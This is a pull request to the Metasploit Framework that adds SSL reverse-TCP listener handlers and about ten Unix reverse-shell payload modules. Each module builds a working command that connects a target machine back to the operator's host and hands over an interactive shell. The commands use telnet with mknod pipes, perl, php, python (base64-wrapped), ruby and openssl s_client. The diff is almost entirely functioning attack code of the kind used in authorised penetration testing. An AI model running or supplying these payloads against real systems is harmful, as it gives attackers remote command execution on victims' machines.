### PR TITLE
This commit adds reverse SSL handler and payloads

### DIFF
--- a/lib/msf/core/handler/reverse_tcp_double_ssl.rb
+++ b/lib/msf/core/handler/reverse_tcp_double_ssl.rb
@@ -1,0 +1,76 @@
+# -*- coding: binary -*-
+require 'msf/core/handler/reverse_tcp_double'
+module Msf
+module Handler
+
+###
+#
+# This module implements the reverse double TCP SSL handler. This means
+# that it listens on a port waiting for a two connections, one connection
+# is treated as stdin, the other as stdout.
+#
+# This handler depends on having a local host and port to
+# listen on.
+#
+###
+module ReverseTcpDoubleSsl
+
+	include Msf::Handler::ReverseTcpDouble
+
+	#
+	# Returns the string representation of the handler type, in this case
+	#
+	def self.handler_type
+		return "reverse_tcp_double_ssl"
+	end
+
+	#
+	# Returns the connection-described general handler type, in this case
+	# 'reverse'.
+	#
+	def self.general_handler_type
+		"reverse"
+	end
+
+	#
+	# Initializes the reverse TCP handler and ads the options that are required
+	# for all reverse TCP payloads, like local host and local port.
+	#
+	def initialize(info = {})
+		super
+
+		# XXX: Not supported by all modules
+		register_advanced_options(
+			[
+				OptPath.new('SSLCert',    [ false, 'Path to a custom SSL certificate (default is randomly generated)'])
+			], Msf::Handler::ReverseTcpDoubleSsl)
+	end
+
+	#
+	# Starts the listener but does not actually attempt
+	# to accept a connection.  Throws socket exceptions
+	# if it fails to start the listener.
+	#
+	def setup_handler
+		if datastore['Proxies']
+			raise 'tcp connectback can not be used with proxies'
+		end
+
+		comm.extend(Rex::Socket::SslTcp)
+		self.listener_sock = Rex::Socket::SslTcpServer.create(
+		'LocalHost' => datastore['LHOST'],
+		'LocalPort' => datastore['LPORT'].to_i,
+		'Comm'      => comm,
+		'SSLCert'	=> datastore['SSLCert'],
+		'Context'   =>
+			{
+				'Msf'        => framework,
+				'MsfPayload' => self,
+				'MsfExploit' => assoc_exploit
+			})
+	end
+
+
+end
+end
+end

--- a/lib/msf/core/handler/reverse_tcp_ssl.rb
+++ b/lib/msf/core/handler/reverse_tcp_ssl.rb
@@ -1,0 +1,122 @@
+require 'rex/socket'
+require 'thread'
+
+module Msf
+module Handler
+
+###
+#
+# This module implements the reverse TCP handler.  This means
+# that it listens on a port waiting for a connection until
+# either one is established or it is told to abort.
+#
+# This handler depends on having a local host and port to
+# listen on.
+#
+###
+module ReverseTcpSsl
+
+	include Msf::Handler::ReverseTcp
+
+	#
+	# Returns the string representation of the handler type, in this case
+	# 'reverse_tcp_ssl'.
+	#
+	def self.handler_type
+		return "reverse_tcp_ssl"
+	end
+
+	#
+	# Returns the connection-described general handler type, in this case
+	# 'reverse'.
+	#
+	def self.general_handler_type
+		"reverse"
+	end
+
+	#
+	# Initializes the reverse TCP SSL handler and adds the certificate option.
+	#
+	def initialize(info = {})
+		super
+		register_advanced_options(
+			[
+				OptPath.new('SSLCert',    [ false, 'Path to a custom SSL certificate (default is randomly generated)'])
+			], Msf::Handler::ReverseTcpSsl)
+
+	end
+
+	#
+	# Starts the listener but does not actually attempt
+	# to accept a connection.  Throws socket exceptions
+	# if it fails to start the listener.
+	#
+	def setup_handler
+		if datastore['Proxies']
+			raise RuntimeError, 'TCP connect-back payloads cannot be used with Proxies'
+		end
+
+		ex = false
+		# Switch to IPv6 ANY address if the LHOST is also IPv6
+		addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
+		# First attempt to bind LHOST. If that fails, the user probably has
+		# something else listening on that interface. Try again with ANY_ADDR.
+		any = (addr.length == 4) ? "0.0.0.0" : "::0"
+
+		addrs = [ Rex::Socket.addr_ntoa(addr), any  ]
+
+		comm  = datastore['ReverseListenerComm']
+		if comm.to_s == "local"
+			comm = ::Rex::Socket::Comm::Local
+		else
+			comm = nil
+		end
+
+		if not datastore['ReverseListenerBindAddress'].to_s.empty?
+			# Only try to bind to this specific interface
+			addrs = [ datastore['ReverseListenerBindAddress'] ]
+
+			# Pick the right "any" address if either wildcard is used
+			addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
+		end
+		addrs.each { |ip|
+			begin
+
+				comm.extend(Rex::Socket::SslTcp)
+				self.listener_sock = Rex::Socket::SslTcpServer.create(
+				'LocalHost' => datastore['LHOST'],
+				'LocalPort' => datastore['LPORT'].to_i,
+				'Comm'      => comm,
+				'SSLCert'	=> datastore['SSLCert'],
+				'Context'   =>
+					{
+						'Msf'        => framework,
+						'MsfPayload' => self,
+						'MsfExploit' => assoc_exploit
+					})
+
+				ex = false
+
+				comm_used = comm || Rex::Socket::SwitchBoard.best_comm( ip )
+				comm_used = Rex::Socket::Comm::Local if comm_used == nil
+
+				if( comm_used.respond_to?( :type ) and comm_used.respond_to?( :sid ) )
+					via = "via the #{comm_used.type} on session #{comm_used.sid}"
+				else
+					via = ""
+				end
+
+				print_status("Started reverse SSL handler on #{ip}:#{datastore['LPORT']} #{via}")
+				break
+			rescue
+				ex = $!
+				print_error("Handler failed to bind to #{ip}:#{datastore['LPORT']}")
+			end
+		}
+		raise ex if (ex)
+	end
+
+end
+
+end
+end

--- a/modules/payloads/singles/cmd/unix/reverse_bash_telnet.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_bash_telnet.rb
@@ -1,0 +1,62 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Unix Command Shell, Reverse TCP (telnet)',
+			'Version'       => '$Revision$',
+			'Description'   => %q{
+				Creates an interactive shell via mknod and telnet.
+				This method works on Debian and other systems compiled
+				without /dev/tcp support. 
+				},
+			'Author'        => 'RageLtMan',
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'unix',
+			'Arch'          => ARCH_CMD,
+			'Handler'       => Msf::Handler::ReverseTcp,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadType'   => 'cmd_bash',
+			'RequiredCmd'   => 'bash-tcp',
+			'Payload'       =>
+				{
+					'Offsets' => { },
+					'Payload' => ''
+				}
+			))
+	end
+
+	#
+	# Constructs the payload
+	#
+	def generate
+		vprint_good(command_string)
+		return super + command_string
+	end
+
+	#
+	# Returns the command string to use for execution
+	#
+	def command_string
+		pipe_name = Rex::Text.rand_text_alpha( rand(4) + 8 )
+		cmd = "mknod #{pipe_name} p && telnet #{datastore['LHOST']} #{datastore['LPORT']} 0<#{pipe_name} | $(which $0) 1>#{pipe_name} & sleep 10 && rm #{pipe_name} &"
+	end
+end

--- a/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb
@@ -1,0 +1,63 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp_ssl'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Unix Command Shell, Reverse TCP SSL (telnet)',
+			'Version'       => '$Revision$',
+			'Description'   => %q{
+				Creates an interactive shell via mknod and telnet.
+				This method works on Debian and other systems compiled
+				without /dev/tcp support. This module uses the '-z' 
+				option included on some systems to encrypt using SSL.
+				},
+			'Author'        => 'RageLtMan',
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'unix',
+			'Arch'          => ARCH_CMD,
+			'Handler'       => Msf::Handler::ReverseTcpSsl,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadType'   => 'cmd_bash',
+			'RequiredCmd'   => 'bash-tcp',
+			'Payload'       =>
+				{
+					'Offsets' => { },
+					'Payload' => ''
+				}
+			))
+	end
+
+	#
+	# Constructs the payload
+	#
+	def generate
+		vprint_good(command_string)
+		return super + command_string
+	end
+
+	#
+	# Returns the command string to use for execution
+	#
+	def command_string
+		pipe_name = Rex::Text.rand_text_alpha( rand(4) + 8 )
+		cmd = "mknod #{pipe_name} p && telnet -z verify=0 #{datastore['LHOST']} #{datastore['LPORT']} 0<#{pipe_name} | $(which $0) 1>#{pipe_name} & sleep 10 && rm #{pipe_name} &"
+	end
+end

--- a/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb
@@ -1,0 +1,62 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp_ssl'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Unix Command Shell, Reverse TCP SSL (via perl)',
+			'Version'       => '$Revision$',
+			'Description'   => 'Creates an interactive shell via perl, uses SSL',
+			'Author'        => 'RageLtMan',
+			'License'       => BSD_LICENSE,
+			'Platform'      => 'unix',
+			'Arch'          => ARCH_CMD,
+			'Handler'       => Msf::Handler::ReverseTcpSsl,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadType'   => 'cmd',
+			'RequiredCmd'   => 'perl',
+			'Payload'       =>
+				{
+					'Offsets' => { },
+					'Payload' => ''
+				}
+			))
+	end
+
+	#
+	# Constructs the payload
+	#
+	def generate
+		vprint_good(command_string)
+		return super + command_string
+	end
+
+	#
+	# Returns the command string to use for execution
+	#
+	def command_string
+		lhost = datastore['LHOST']
+		ver   = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
+		lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
+		# Need a succinct way to determine when $c is closed from the framework side, this method is presently unsafe as it leaves the process hanging
+		cmd = "perl -e 'use IO::Socket::SSL;$p=fork;exit,if($p);$c=IO::Socket::SSL->new(\"#{lhost}:#{datastore['LPORT']}\");while($c){sysread($c,$i,8192);syswrite($c,`$i`);}'"
+	end
+
+end

--- a/modules/payloads/singles/cmd/unix/reverse_php.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_php.rb
@@ -1,0 +1,61 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Unix Command Shell, Reverse TCP (via php)',
+			'Version'       => '$Revision$',
+			'Description'   => 'Creates an interactive shell via php',
+			'Author'        => 'RageLtMan',
+			'License'       => BSD_LICENSE,
+			'Platform'      => 'unix',
+			'Arch'          => ARCH_CMD,
+			'Handler'       => Msf::Handler::ReverseTcp,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadType'   => 'cmd',
+			'RequiredCmd'   => 'php',
+			'Payload'       =>
+				{
+					'Offsets' => { },
+					'Payload' => ''
+				}
+			))
+	end
+
+	#
+	# Constructs the payload
+	#
+	def generate
+		vprint_good(command_string)
+		return super + command_string
+	end
+
+	#
+	# Returns the command string to use for execution
+	#
+	def command_string
+		lhost = datastore['LHOST']
+		ver   = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
+		lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
+		cmd = "php -r '$s=fsockopen(\"#{datastore['LHOST']}\",#{datastore['LPORT']});exec(\"/bin/sh -i <&3 >&3 2>&3\");'&"
+	end
+
+end

--- a/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb
@@ -1,0 +1,61 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp_ssl'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Unix Command Shell, Reverse TCP SSL (via php)',
+			'Version'       => '$Revision$',
+			'Description'   => 'Creates an interactive shell via php, uses SSL',
+			'Author'        => 'RageLtMan',
+			'License'       => BSD_LICENSE,
+			'Platform'      => 'unix',
+			'Arch'          => ARCH_CMD,
+			'Handler'       => Msf::Handler::ReverseTcpSsl,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadType'   => 'cmd',
+			'RequiredCmd'   => 'php',
+			'Payload'       =>
+				{
+					'Offsets' => { },
+					'Payload' => ''
+				}
+			))
+	end
+
+	#
+	# Constructs the payload
+	#
+	def generate
+		vprint_good(command_string)
+		return super + command_string
+	end
+
+	#
+	# Returns the command string to use for execution
+	#
+	def command_string
+		lhost = datastore['LHOST']
+		ver   = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
+		lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
+		cmd = "php -r '$s=fsockopen(\"ssl://#{datastore['LHOST']}\",#{datastore['LPORT']});while(!feof($s)){exec(fgets($s),$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}'&"
+	end
+
+end

--- a/modules/payloads/singles/cmd/unix/reverse_python2.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_python2.rb
@@ -1,0 +1,78 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Unix Command Shell, Reverse TCP (via Python loop)',
+			'Version'       => '$Revision$',
+			'Description'   => 'Creates an interactive shell via python, encodes with base64 by design.',
+			'Author'        => 'RageLtMan',
+			'License'       => BSD_LICENSE,
+			'Platform'      => 'unix',
+			'Arch'          => ARCH_CMD,
+			'Handler'       => Msf::Handler::ReverseTcp,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadType'   => 'cmd',
+			'RequiredCmd'   => 'python',
+			'Payload'       =>
+				{
+					'Offsets' => { },
+					'Payload' => ''
+				}
+			))
+	end
+
+	#
+	# Constructs the payload
+	#
+	def generate
+		vprint_good(command_string)
+		return super + command_string
+	end
+
+	#
+	# Returns the command string to use for execution
+	#
+	def command_string
+		cmd = ''
+		dead = Rex::Text.rand_text_alpha(2)
+		# Set up the socket
+		cmd += "import socket,subprocess,os\n"
+		cmd += "s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n"
+		cmd += "s.connect(('#{datastore['LHOST']}',#{datastore['LPORT']}))\n"
+		# The actual IO
+		cmd += "#{dead}=False\n"
+		cmd += "while not #{dead}:\n"
+		cmd += "\tdata=s.recv(1024)\n"
+		cmd += "\tif len(data)==0:\n\t\t#{dead} = True\n"
+		cmd += "\tproc=subprocess.Popen(data,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n"
+		cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n"
+		cmd += "\ts.send(stdout_value)\n"
+
+		# The *nix shell wrapper to keep things clean
+		# Base64 encoding is required in order to handle Python's formatting requirements in the while loop
+		cmd = "python -c \"exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))\""
+		cmd += ' >/dev/null 2>&1 &'
+		return cmd
+
+	end
+
+end

--- a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
@@ -1,0 +1,79 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp_ssl'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Unix Command Shell, Reverse TCP SSL (via python)',
+			'Version'       => '$Revision$',
+			'Description'   => 'Creates an interactive shell via python, uses SSL, encodes with base64 by design.',
+			'Author'        => 'RageLtMan',
+			'License'       => BSD_LICENSE,
+			'Platform'      => 'unix',
+			'Arch'          => ARCH_CMD,
+			'Handler'       => Msf::Handler::ReverseTcpSsl,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadType'   => 'cmd',
+			'RequiredCmd'   => 'python',
+			'Payload'       =>
+				{
+					'Offsets' => { },
+					'Payload' => ''
+				}
+			))
+	end
+
+	#
+	# Constructs the payload
+	#
+	def generate
+		vprint_good(command_string)
+		return super + command_string
+	end
+
+	#
+	# Returns the command string to use for execution
+	#
+	def command_string
+		cmd = ''
+		dead = Rex::Text.rand_text_alpha(2)
+		# Set up the socket
+		cmd += "import socket,subprocess,os,ssl\n"
+		cmd += "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n"
+		cmd += "so.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
+		cmd += "s=ssl.wrap_socket(so)\n"
+		# The actual IO
+		cmd += "#{dead}=False\n"
+		cmd += "while not #{dead}:\n"
+		cmd += "\tdata=s.recv(1024)\n"
+		cmd += "\tif len(data)==0:\n\t\t#{dead} = True\n"
+		cmd += "\tproc=subprocess.Popen(data,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n"
+		cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n"
+		cmd += "\ts.send(stdout_value)\n"
+
+		# The *nix shell wrapper to keep things clean
+		# Base64 encoding is required in order to handle Python's formatting requirements in the while loop
+		cmd = "python -c \"exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))\""
+		cmd += ' >/dev/null 2>&1 &'
+		return cmd
+
+	end
+
+end

--- a/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb
@@ -1,0 +1,49 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp_ssl'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'        => 'Unix Command Shell, Reverse TCP SSL (via Ruby)',
+			'Version'     => '$Revision$',
+			'Description' => 'Connect back and create a command shell via Ruby, uses SSL',
+			'Author'      => 'RageLtMan',
+			'License'     => MSF_LICENSE,
+			'Platform'    => 'unix',
+			'Arch'        => ARCH_CMD,
+			'Handler'     => Msf::Handler::ReverseTcpSsl,
+			'Session'     => Msf::Sessions::CommandShell,
+			'PayloadType' => 'cmd',
+			'RequiredCmd' => 'ruby',
+			'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+		))
+	end
+
+	def generate
+		vprint_good(command_string)
+		return super + command_string
+	end
+
+	def command_string
+		lhost = datastore['LHOST']
+		lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
+		"ruby -rsocket -ropenssl -e 'exit if fork;c=OpenSSL::SSL::SSLSocket.new(TCPSocket.new(\"#{lhost}\",\"#{datastore['LPORT']}\")).connect;while(cmd=c.gets);IO.popen(cmd.to_s,\"r\"){|io|c.print io.read}end'"
+	end
+end

--- a/modules/payloads/singles/cmd/unix/reverse_ssl_double.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_ssl_double.rb
@@ -1,0 +1,68 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp_double_ssl'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Unix Command Shell, Double reverse TCP SSL (openssl)',
+			'Version'       => '$Revision$',
+			'Description'   => 'Creates an interactive shell through two openssl encrypted inbound connections',
+			'Author'        => [
+				'hdm',	# Original module
+				'RageLtMan', # SSL support
+			],
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'unix',
+			'Arch'          => ARCH_CMD,
+			'Handler'       => Msf::Handler::ReverseTcpDoubleSsl,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadType'   => 'cmd',
+			'RequiredCmd'   => 'telnet',
+			'Payload'       =>
+				{
+					'Offsets' => { },
+					'Payload' => ''
+				}
+			))
+	end
+
+	#
+	# Constructs the payload
+	#
+	def generate
+		vprint_good(command_string)
+		return super + command_string
+	end
+
+	#
+	# Returns the command string to use for execution
+	#
+	def command_string
+		lhost = datastore['LHOST']
+		ver   = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
+		lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
+		cmd = ''
+        	cmd += "openssl s_client -connect #{lhost}:#{datastore['LPORT']}|"
+	        cmd += "/bin/sh -i|openssl s_client -connect #{lhost}:#{datastore['LPORT']}"
+	        cmd += " >/dev/null 2>&1 &\n"
+		return cmd
+	end
+
+end

--- a/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb
@@ -1,0 +1,67 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp_double_ssl'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Unix Command Shell, Double reverse TCP SSL (telnet)',
+			'Version'       => '$Revision$',
+			'Description'   => 'Creates an interactive shell through two inbound connections, encrypts using SSL via "-z" option',
+			'Author'        => [
+				'hdm',	# Original module
+				'RageLtMan', # SSL support
+			],
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'unix',
+			'Arch'          => ARCH_CMD,
+			'Handler'       => Msf::Handler::ReverseTcpDoubleSsl,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadType'   => 'cmd',
+			'RequiredCmd'   => 'telnet',
+			'Payload'       =>
+				{
+					'Offsets' => { },
+					'Payload' => ''
+				}
+			))
+	end
+
+	#
+	# Constructs the payload
+	#
+	def generate
+		
+		return super + command_string
+	end
+
+	#
+	# Returns the command string to use for execution
+	#
+	def command_string
+		cmd =
+			"sh -c '(sleep #{3600+rand(1024)}|" +
+			"telnet -z #{datastore['LHOST']} #{datastore['LPORT']}|" +
+			"while : ; do sh && break; done 2>&1|" +
+			"telnet -z #{datastore['LHOST']} #{datastore['LPORT']}" +
+			" >/dev/null 2>&1 &)'"
+		return cmd
+	end
+
+end


### PR DESCRIPTION
Handlers added: reverse_tcp_ssl reverse_double_tcp_ssl
Cleartext reverse shells (unix): bash telnet, php, python
SSL reverse shells (unix): bash telnet, perl, php, python,
ruby, openssl s_client double and telnet -z double.

This pull request replaces the prior (broken git-side) pull req
and adds the openssl s_client reverse shell method. The shells
have been tested for a while now, with the cleanest being
python_ssl and perl_ssl. Until a mac meterpreter is built, this
may be the safest way to operate a reverse shell on OSX machines.

TODO:
Corresponding bind shells should also be built along with windows
equivalents if Meterpreter is somehow unavailable.
Out of band Meterpreters (PHP, Java) can use SSL sockets.
Socat testing and modification (channelization etc).
